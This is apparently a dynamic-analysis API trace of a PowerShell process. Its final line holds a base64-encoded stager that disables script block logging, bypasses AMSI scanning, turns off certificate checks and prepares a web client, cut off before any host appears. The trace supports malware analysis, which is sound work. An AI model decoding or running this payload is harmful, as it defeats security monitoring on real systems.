	[0121.703] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a910 | out: lpFileInformation=0xd7edd8a910*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.703] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.703] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0121.703] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.703] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a910 | out: lpFileInformation=0xd7edd8a910*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.703] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0xd7edd8a710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0121.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0121.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.704] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a910 | out: lpFileInformation=0xd7edd8a910*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.704] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.704] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a910 | out: lpFileInformation=0xd7edd8a910*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.704] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.704] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xd7edd8a740, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0121.704] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.704] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a950 | out: lpFileInformation=0xd7edd8a950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1f5eb76f, ftLastAccessTime.dwHighDateTime=0x1d30b90, ftLastWriteTime.dwLowDateTime=0x1f5eb76f, ftLastWriteTime.dwHighDateTime=0x1d30b90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0121.705] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.705] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xd7edd8a740, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0121.705] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.705] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a950 | out: lpFileInformation=0xd7edd8a950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1f5eb76f, ftLastAccessTime.dwHighDateTime=0x1d30b90, ftLastWriteTime.dwLowDateTime=0x1f5eb76f, ftLastWriteTime.dwHighDateTime=0x1d30b90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0121.705] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.705] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xd7edd8a750, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0121.705] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a640, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0121.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0xd7edd8a740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0121.705] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a950 | out: lpFileInformation=0xd7edd8a950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.705] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0xd7edd8a740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0121.705] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a950 | out: lpFileInformation=0xd7edd8a950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.705] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0xd7edd8a750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0121.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0121.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.705] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.706] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a950 | out: lpFileInformation=0xd7edd8a950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.706] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.706] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.706] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.706] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a950 | out: lpFileInformation=0xd7edd8a950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.706] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.706] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.706] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.709] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0xd7edd8a9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0121.709] SetErrorMode (uMode=0x1) returned 0x8001
	[0121.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8ac10 | out: lpFileInformation=0xd7edd8ac10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0121.709] SetErrorMode (uMode=0x8001) returned 0x1
	[0121.711] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad3baaa0a0, nSize=0xd7edd8af78 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8af78) returned 0x1
	[0121.712] CoTaskMemFree (pv=0x2ad3baaa0a0) 
	[0121.712] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b910
	[0121.712] GetUserNameW (in: lpBuffer=0x2ad2069b910, pcbBuffer=0xd7edd8afb8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8afb8) returned 1
	[0121.712] CoTaskMemFree (pv=0x2ad2069b910) 
	[0121.713] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad237171d0*="Available", lpRawData=0x2ad23716f60) returned 1
	[0121.713] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d552e0
	[0121.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d552e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.713] CoTaskMemFree (pv=0x2ad22d552e0) 
	[0121.714] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55610
	[0121.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.714] CoTaskMemFree (pv=0x2ad22d55610) 
	[0121.718] GetCurrentProcessId () returned 0x434
	[0121.722] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8af98 | out: phkResult=0xd7edd8af98*=0x694) returned 0x0
	[0121.722] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xd7edd8af1c, lpData=0x0, lpcbData=0xd7edd8af18*=0x0 | out: lpType=0xd7edd8af1c*=0x1, lpData=0x0, lpcbData=0xd7edd8af18*=0x56) returned 0x0
	[0121.722] CoTaskMemAlloc (cb=0x5a) returned 0x2ad22d5cb20
	[0121.722] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xd7edd8aeec, lpData=0x2ad22d5cb20, lpcbData=0xd7edd8aee8*=0x56 | out: lpType=0xd7edd8aeec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xd7edd8aee8*=0x56) returned 0x0
	[0121.722] CoTaskMemFree (pv=0x2ad22d5cb20) 
	[0121.723] RegCloseKey (hKey=0x694) returned 0x0
	[0121.723] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55c70
	[0121.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55c70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.724] CoTaskMemFree (pv=0x2ad22d55c70) 
	[0121.725] CoCreateGuid (in: pguid=0xd7edd8b360 | out: pguid=0xd7edd8b360*(Data1=0x68674150, Data2=0xbe42, Data3=0x46bf, Data4=([0]=0x89, [1]=0x1c, [2]=0x99, [3]=0x2, [4]=0xc2, [5]=0x9a, [6]=0xe6, [7]=0xd3))) returned 0x0
	[0121.831] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8b148 | out: phkResult=0xd7edd8b148*=0x694) returned 0x0
	[0121.832] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xd7edd8b0cc, lpData=0x0, lpcbData=0xd7edd8b0c8*=0x0 | out: lpType=0xd7edd8b0cc*=0x1, lpData=0x0, lpcbData=0xd7edd8b0c8*=0x56) returned 0x0
	[0121.832] CoTaskMemAlloc (cb=0x5a) returned 0x2ad22d5dae0
	[0121.832] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xd7edd8b09c, lpData=0x2ad22d5dae0, lpcbData=0xd7edd8b098*=0x56 | out: lpType=0xd7edd8b09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xd7edd8b098*=0x56) returned 0x0
	[0121.832] CoTaskMemFree (pv=0x2ad22d5dae0) 
	[0121.832] RegCloseKey (hKey=0x694) returned 0x0
	[0121.833] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8b148 | out: phkResult=0xd7edd8b148*=0x694) returned 0x0
	[0121.833] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xd7edd8b0cc, lpData=0x0, lpcbData=0xd7edd8b0c8*=0x0 | out: lpType=0xd7edd8b0cc*=0x1, lpData=0x0, lpcbData=0xd7edd8b0c8*=0x56) returned 0x0
	[0121.833] CoTaskMemAlloc (cb=0x5a) returned 0x2ad22d5d220
	[0121.833] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xd7edd8b09c, lpData=0x2ad22d5d220, lpcbData=0xd7edd8b098*=0x56 | out: lpType=0xd7edd8b09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xd7edd8b098*=0x56) returned 0x0
	[0121.833] CoTaskMemFree (pv=0x2ad22d5d220) 
	[0121.833] RegCloseKey (hKey=0x694) returned 0x0
	[0121.833] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ad22d50c70 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0121.833] CoTaskMemFree (pv=0x2ad22d50c70) 
	[0121.833] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0xd7edd8acc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0121.833] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ad22d521b0 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0121.833] CoTaskMemFree (pv=0x2ad22d521b0) 
	[0121.833] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0xd7edd8acc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0121.842] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55c70
	[0121.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55c70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.842] CoTaskMemFree (pv=0x2ad22d55c70) 
	[0121.844] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d552e0
	[0121.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d552e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.844] CoTaskMemFree (pv=0x2ad22d552e0) 
	[0121.847] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54950
	[0121.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.847] CoTaskMemFree (pv=0x2ad22d54950) 
	[0121.853] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d553f0
	[0121.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d553f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.853] CoTaskMemFree (pv=0x2ad22d553f0) 
	[0121.854] SetEvent (hEvent=0x648) returned 1
	[0121.854] SetEvent (hEvent=0x694) returned 1
	[0121.854] SetEvent (hEvent=0x640) returned 1
	[0121.854] SetEvent (hEvent=0x630) returned 1
	[0121.857] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54a60
	[0121.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54a60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.857] CoTaskMemFree (pv=0x2ad22d54a60) 
	[0121.857] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54620
	[0121.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.857] CoTaskMemFree (pv=0x2ad22d54620) 
	[0121.859] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54730
	[0121.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.859] CoTaskMemFree (pv=0x2ad22d54730) 
	[0121.864] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55a50
	[0121.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55a50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.864] CoTaskMemFree (pv=0x2ad22d55a50) 
	[0121.864] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ad08 | out: phkResult=0xd7edd8ad08*=0x650) returned 0x0
	[0121.864] RegQueryValueExW (in: hKey=0x650, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xd7edd8ac8c, lpData=0x0, lpcbData=0xd7edd8ac88*=0x0 | out: lpType=0xd7edd8ac8c*=0x0, lpData=0x0, lpcbData=0xd7edd8ac88*=0x0) returned 0x2
	[0122.279] SysStringLen (param_1="SQBmACgAJABQAFMAVgBlAFIAcwBpAE8ATgBUAEEAQgBMAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AQQBqAE8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAGYAXQAuAEEAUwBzAEUATQBCAGwAWQAuAEcAZQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAGEATABVAEUAKAAkAG4AVQBsAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBsAD0AWwBDAE8AbABsAGUAQwB0AEkAbwBOAFMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABJAE8ATgBBAHIAWQBbAFMAVAByAEkATgBHACwAUwBZAFMAdABFAE0ALgBPAEIAagBlAGMAVABdAF0AOgA6AG4AZQBXACgAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABzAGUAewBbAFMAQwByAGkAcAB0AEIAbABPAEMASwBdAC4AIgBHAEUAVABGAGkARQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAVQBlACgAJABuAFUAbABsACwAKABOAEUAVwAtAE8AYgBKAEUAYwB0ACAAQwBvAEwATABlAEMAdABJAG8AbgBTAC4ARwBFAG4ARQByAEkAQwAuAEgAQQBzAEgAUwBFAFQAWwBTAFQAUgBpAG4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAcwBzAEUATQBCAGwAeQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAFQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAGEAbABVAEUAKAAkAE4AdQBMAGwALAAkAFQAUgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFMARQBSAFYASQBjAGUAUABPAGkAbgBUAE0AYQBuAGEAZwBlAFIAXQA6ADoARQBYAFAAZQBjAHQAMQAwADAAQwBPAE4AdABJAG4AVQBlAD0AMAA7ACQAdwBjAD0ATgBFAFcALQBPAGIAagBlAEMAVAAgAFMAWQBzAHQARQBtAC4ATgBlAFQALgBXAEUAYgBDAGwAaQBlAG4AVAA7ACQAdQA9ACcATQBpAGMAcgBvAHMAbwBmAHQALQBDAHIAeQBwAHQAbwBBAFAASQAvADYALgAzACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJAB3AGMALgBIAEUAQQBEAEUAcgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwBYAFkAPQBbAFMAWQBzAHQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAEUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAEEAdQBMAFQAVwBlAEIAUAByAG8AeABZADsAJABXAGMALgBQAHIATwB4AHkALgBDAFIARQBEAGUATgB0AEkAYQBsAFMAIAA9ACAAWwBTAHkAcwB0AEUATQAuAE4ARQB0AC4AQwByAEUARABlAE4AdABJAEEATABDAGE